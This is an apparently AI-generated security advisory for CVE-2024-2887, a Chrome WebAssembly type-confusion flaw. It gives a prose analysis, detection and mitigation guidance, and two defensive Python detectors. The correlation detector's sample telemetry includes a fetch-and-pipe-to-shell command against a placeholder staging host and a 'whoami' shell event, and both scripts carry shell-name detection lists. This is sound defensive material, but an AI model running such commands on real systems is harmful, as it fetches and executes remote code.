CVE-2024-2887 Overview
CVE-2024-2887 is a type confusion vulnerability in the WebAssembly (Wasm) engine of Google Chrome versions prior to 123.0.6312.86. A remote attacker can execute arbitrary code in the renderer process by serving a crafted HTML page that loads a malicious WebAssembly module. The flaw was demonstrated as a Pwn2Own winning entry, as documented by the Zero Day Initiative. The bug is categorized as [CWE-843] Access of Resource Using Incompatible Type ('Type Confusion'). Chromium-derived browsers and Fedora releases shipping the affected Chromium package are also impacted.
Critical Impact
Successful exploitation enables arbitrary code execution in the renderer process from a single visit to an attacker-controlled web page.
Affected Products
- Google Chrome prior to 123.0.6312.86
- Fedora 38, 39, and 40 distributions packaging vulnerable Chromium builds
- Chromium-based browsers embedding the affected V8/WebAssembly engine
Discovery Timeline
- 2024-03-26 - Google releases Chrome 123.0.6312.86 containing the security fix
- 2024-03-26 - CVE-2024-2887 published to the National Vulnerability Database (NVD)
- 2024-05-02 - Zero Day Initiative publishes technical analysis identifying this as a Pwn2Own winning bug
- 2025-03-28 - Last updated in NVD database
Technical Details for CVE-2024-2887
Vulnerability Analysis
The vulnerability resides in Chrome's WebAssembly implementation within the V8 JavaScript engine. WebAssembly is a low-level binary instruction format that executes inside the browser's renderer sandbox at near-native speed. A type confusion condition arises when the engine treats an object of one type as an incompatible type during Wasm module compilation or execution. Because the engine's subsequent loads and stores are sized and laid out for the wrong type, the mismatch produces memory-unsafe behavior: an attacker can use it to read or write outside the bounds of the originally typed object and, from there, corrupt other V8 heap objects until the renderer process is steered toward attacker-controlled execution. Because WebAssembly is reachable from any web origin, no authentication or special privileges are required; the victim only has to load the page.
Root Cause
The root cause is improper type validation in the WebAssembly pipeline, classified as [CWE-843]. The engine fails to enforce consistent type identity between a producer and consumer of an object reference. This allows a crafted Wasm module to confuse type metadata used during JIT compilation or runtime dispatch, yielding an exploitable primitive.
Attack Vector
Exploitation requires the victim to load a crafted HTML page that instantiates a malicious WebAssembly module. The page triggers the type confusion in the renderer process, producing an arbitrary read/write primitive that can be chained into code execution inside the renderer. On its own the bug yields code execution within the renderer sandbox; chaining it with a separate sandbox escape is what turns it into full remote code execution on the host.
// No verified proof-of-concept code is publicly available.
// See https://issues.chromium.org/issues/330588502 for vendor tracking.
// Refer to the Zero Day Initiative analysis for exploitation context.
Detection Methods for CVE-2024-2887
Indicators of Compromise
- Chrome renderer process crashes referencing v8::internal::wasm frames or unexpected SIGSEGV events in crash dumps.
- Outbound connections from Chrome renderer or child processes to previously unseen domains immediately after loading a page hosting WebAssembly.
- Browser instances spawning unexpected child processes such as cmd.exe, powershell.exe, or shell interpreters on macOS and Linux.
- Endpoints running Chrome builds older than 123.0.6312.86 reported by software inventory tools.
Detection Strategies
- Inventory installed Chrome and Chromium-based browser versions across endpoints and flag any build below 123.0.6312.86.
- Inspect HTML and JavaScript fetched from untrusted origins for inline or remotely loaded .wasm payloads, especially those served alongside heap-grooming JavaScript.
- Correlate browser process crashes with subsequent process creation events to surface post-exploitation activity.
- Apply web proxy logging to capture Content-Type: application/wasm responses from low-reputation domains.
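The two inspection points above (Wasm payloads fetched from untrusted origins, and Content-Type: application/wasm responses in proxy logs) miss a common delivery path: a module embedded in JavaScript as a base64 string and fed to WebAssembly.instantiate, which never produces an application/wasm response. The detector below, an added example that is not from the original page or from any Chromium or ZDI tooling, checks the Content-Type header, the \0asm magic bytes, references to the WebAssembly API, and the base64 encoding of the magic ("AGFzbQ", the stable prefix of a module encoded from its first byte). The responses, host names and the base64 blob are constructed for illustration; the blob is a truncated stand-in, not a working module.

```python
"""Flag HTTP responses that deliver WebAssembly, including inline base64 delivery.

Added example, not from the original page and not from any Chromium or ZDI tool.
The responses below are constructed for illustration; host names are placeholders
and the base64 blob is a truncated stand-in, not a working module.
"""
import base64
import binascii
import re

WASM_MAGIC = b"\x00asm"  # every Wasm binary begins with these four bytes
# base64 of b"\x00asm\x01" is "AGFzbQE"; "AGFzbQ" is the stable prefix whenever the
# module is encoded starting at its first byte (a version-1 header keeps the 'Q').
B64_MODULE_RE = re.compile(rb"AGFzbQ[A-Za-z0-9+/]{16,}={0,2}")
WASM_API_RE = re.compile(rb"\bWebAssembly\.(?:instantiate|compile|validate|Module|Instance)")

SAMPLE_RESPONSES = [  # (url, headers, body) triples, constructed for this example
    ("https://cdn.example/lib.wasm",
     {"content-type": "application/wasm"},
     b"\x00asm\x01\x00\x00\x00\x01\x06\x01\x60\x01\x7f\x01\x7f"),
    ("https://example.net/app.js",
     {"content-type": "application/javascript"},
     b'const blob = "AGFzbQEAAAABBgFgAX8BfwMCAQAHBwEDZmliAAAKBgEEACAAC";\n'
     b'const bytes = Uint8Array.from(atob(blob), c => c.charCodeAt(0));\n'
     b'WebAssembly.instantiate(bytes).then(m => m.instance.exports.fib(10));\n'),
    ("https://example.org/index.html",
     {"content-type": "text/html"},
     b"<html><body>no wasm here</body></html>"),
]


def wasm_indicators(headers: dict, body: bytes) -> list[str]:
    """Return every reason this response looks like it delivers WebAssembly."""
    reasons = []
    if "application/wasm" in headers.get("content-type", "").lower():
        reasons.append("content-type application/wasm")
    if body.startswith(WASM_MAGIC):
        reasons.append("body starts with Wasm magic bytes")
    if WASM_API_RE.search(body):
        reasons.append("script references the WebAssembly API")
    for m in B64_MODULE_RE.finditer(body):
        try:
            # 8 base64 chars decode to 6 bytes, enough to confirm the magic
            head = base64.b64decode(m.group(0)[:8])
        except binascii.Error:
            continue
        if head.startswith(WASM_MAGIC):
            reasons.append("inline base64 WebAssembly module")
            break
    return reasons


def scan_responses(responses) -> dict:
    """Map URL -> indicator list for every response carrying at least one indicator."""
    flagged = {}
    for url, headers, body in responses:
        reasons = wasm_indicators(headers, body)
        if reasons:
            flagged[url] = reasons
    return flagged


if __name__ == "__main__":
    for url, reasons in scan_responses(SAMPLE_RESPONSES).items():
        print(url, "->", "; ".join(reasons))
```

Joining the flagged URLs against a domain-reputation feed is left to the proxy; the point of the base64 check is that a MIME-type filter alone can be bypassed by any page that ships the module inline.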
Monitoring Recommendations
- Forward Chrome crash telemetry and EDR process-tree data into a centralized analytics platform for correlation.
- Alert on child processes spawned by chrome.exe, chrome, or renderer helper processes that fall outside expected baselines.
- Track DNS and HTTP egress from browsers to newly registered domains, which are common staging hosts for browser exploits.
- Maintain alerting on patch compliance gaps for browsers across all managed operating systems, including Fedora hosts.
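The three telemetry streams the lists above ask for (browser inventory, renderer crash dumps, EDR process trees) only become a detection once they are joined per host. The script below, an added example rather than anything from the original page or from a particular EDR product, runs that join over constructed events: it flags Chrome builds below 123.0.6312.86 by numeric version comparison, flags crashes whose stack contains v8::internal::wasm frames, flags shells spawned by a browser process, and escalates a browser-spawned shell that follows a Wasm crash on the same host within a 60-second window. The event field names, the browser and shell image-name sets, the window length, and the host names and paths are assumptions to adapt to your own schema.

```python
"""Correlate browser inventory, crash and process-creation telemetry for CVE-2024-2887.

Added example, not part of the original page and not tied to any EDR product: the
event shapes, image-name sets and sample events are constructed for illustration,
and the host names and paths are placeholders.
"""
from datetime import datetime, timedelta
from pathlib import PurePath

FIXED_VERSION = (123, 0, 6312, 86)  # first Chrome build carrying the fix
BROWSER_IMAGES = {"chrome", "chrome.exe", "google-chrome", "chromium",
                  "chromium-browser", "msedge.exe", "brave"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "zsh", "dash"}
CRASH_WINDOW = timedelta(seconds=60)  # assumed window between crash and follow-on activity

SAMPLE_EVENTS = [  # constructed telemetry; ts is ISO 8601, hosts ws-01/ws-02 are placeholders
    {"type": "inventory", "ts": "2024-03-27T08:00:00", "host": "ws-01",
     "version": "Google Chrome 122.0.6261.128"},
    {"type": "inventory", "ts": "2024-03-27T08:00:00", "host": "ws-02",
     "version": "123.0.6312.86"},
    {"type": "crash", "ts": "2024-03-27T09:15:02", "host": "ws-01",
     "frames": ["v8::internal::wasm::WasmCompilationUnit::ExecuteCompilation",
                "v8::internal::Execution::Call"]},
    {"type": "process", "ts": "2024-03-27T09:15:20", "host": "ws-01",
     "image": "/usr/bin/bash", "parent_image": "/opt/google/chrome/chrome",
     "cmdline": "bash -c 'curl http://stage.example/x | sh'"},
    {"type": "process", "ts": "2024-03-27T09:16:00", "host": "ws-02",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"type": "process", "ts": "2024-03-27T09:17:00", "host": "ws-02",
     "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "parent_image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "cmdline": "chrome.exe --type=renderer"},  # normal child renderer, must not fire
]


def parse_version(text: str) -> tuple:
    """'Google Chrome 122.0.6261.128' or '122.0.6261.128' -> (122, 0, 6261, 128)."""
    for token in text.split():
        parts = token.split(".")
        if len(parts) == 4 and all(p.isdigit() for p in parts):
            return tuple(int(p) for p in parts)
    raise ValueError(f"no x.y.z.w version in {text!r}")


def is_vulnerable(version: str) -> bool:
    """Numeric comparison; a string compare would rank 9.x above 123.x."""
    return parse_version(version) < FIXED_VERSION


def _base(path: str) -> str:
    """Case-folded file name from a POSIX or Windows path."""
    return PurePath(path.replace("\\", "/")).name.lower()


def analyze(events: list) -> list:
    """Return findings as dicts with rule, host and detail, in event order."""
    findings = []
    wasm_crashes = []  # (host, time) of crashes with V8 Wasm frames
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "inventory" and is_vulnerable(ev["version"]):
            findings.append({"rule": "unpatched-browser", "host": ev["host"],
                             "detail": ev["version"]})
        elif ev["type"] == "crash" and any("v8::internal::wasm" in f for f in ev["frames"]):
            wasm_crashes.append((ev["host"], t))
            findings.append({"rule": "wasm-renderer-crash", "host": ev["host"],
                             "detail": ev["frames"][0]})
        elif ev["type"] == "process":
            parent, child = _base(ev["parent_image"]), _base(ev["image"])
            if parent in BROWSER_IMAGES and child in SHELL_IMAGES:
                rule = "browser-spawned-shell"
                # escalate when a Wasm crash preceded the shell on the same host
                if any(h == ev["host"] and timedelta(0) <= t - ct <= CRASH_WINDOW
                       for h, ct in wasm_crashes):
                    rule = "browser-spawned-shell-after-wasm-crash"
                findings.append({"rule": rule, "host": ev["host"],
                                 "detail": f"{parent} -> {child}: {ev['cmdline']}"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["rule"], f["host"], f["detail"])
```

Browsers legitimately spawn copies of themselves (renderers, GPU and utility processes), which is why the process rule only fires on shell children; the crash-then-shell escalation is what separates a failed or noisy exploit attempt from an ordinary renderer crash.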
How to Mitigate CVE-2024-2887
Immediate Actions Required
- Update Google Chrome to version 123.0.6312.86 or later on Windows, macOS, and Linux endpoints.
- Apply Fedora package updates referenced in the Fedora package announcements for Fedora 38, 39, and 40.
- Restart all browser instances after patching to ensure the vulnerable renderer is replaced.
- Update Chromium-based browsers such as Edge, Brave, Opera, and Vivaldi to builds that incorporate the Chromium 123.0.6312.86 fix; an early 123 build is not sufficient, so check each vendor's advisory for the corresponding version.
Patch Information
Google addressed the issue in the Stable channel update announced in the Chrome Releases blog on March 26, 2024. Tracking details are available in the Chromium issue tracker. Fedora maintainers shipped corresponding package updates for supported releases.
Workarounds
- Block the JavaScript JIT through the DefaultJavaScriptJitSetting enterprise policy where supported. V8 cannot run WebAssembly in jitless mode, so this removes the Wasm attack surface at the cost of JavaScript performance; use JavaScriptJitAllowedForSites to re-enable the JIT only for vetted sites rather than blocking everywhere and then trying to carve out exceptions.
- Enforce Chrome Site Isolation and the strictest renderer sandbox settings via group policy on managed fleets. This does not stop the renderer from being compromised, but it limits the cross-site data a compromised renderer can reach and keeps the attacker dependent on a separate sandbox escape.
- Route browsing traffic through a secure web gateway that strips or inspects application/wasm responses from uncategorized domains. Note that a module can also be shipped inline as a base64 string inside JavaScript, so MIME-type filtering alone is not a complete control.
- Restrict execution of untrusted browser extensions and limit user navigation to vetted domains until patching is verified.
# Verify the installed Chrome version on Linux (must be 123.0.6312.86 or later)
google-chrome --version
# Update Google's own Chrome package on Fedora (installed from Google's repository)
sudo dnf upgrade --refresh google-chrome-stable
# Update the Chromium package shipped by Fedora itself
sudo dnf upgrade --refresh chromium
# Enterprise policy snippet: block the JavaScript JIT by default (V8 jitless mode
# also disables WebAssembly), then re-allow it only for a vetted internal site.
# "[*.]corp.example" is a placeholder pattern; replace it with your own allowlist.
# /etc/opt/chrome/policies/managed/disable_jit.json
{
  "DefaultJavaScriptJitSetting": 2,
  "JavaScriptJitAllowedForSites": ["[*.]corp.example"]
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.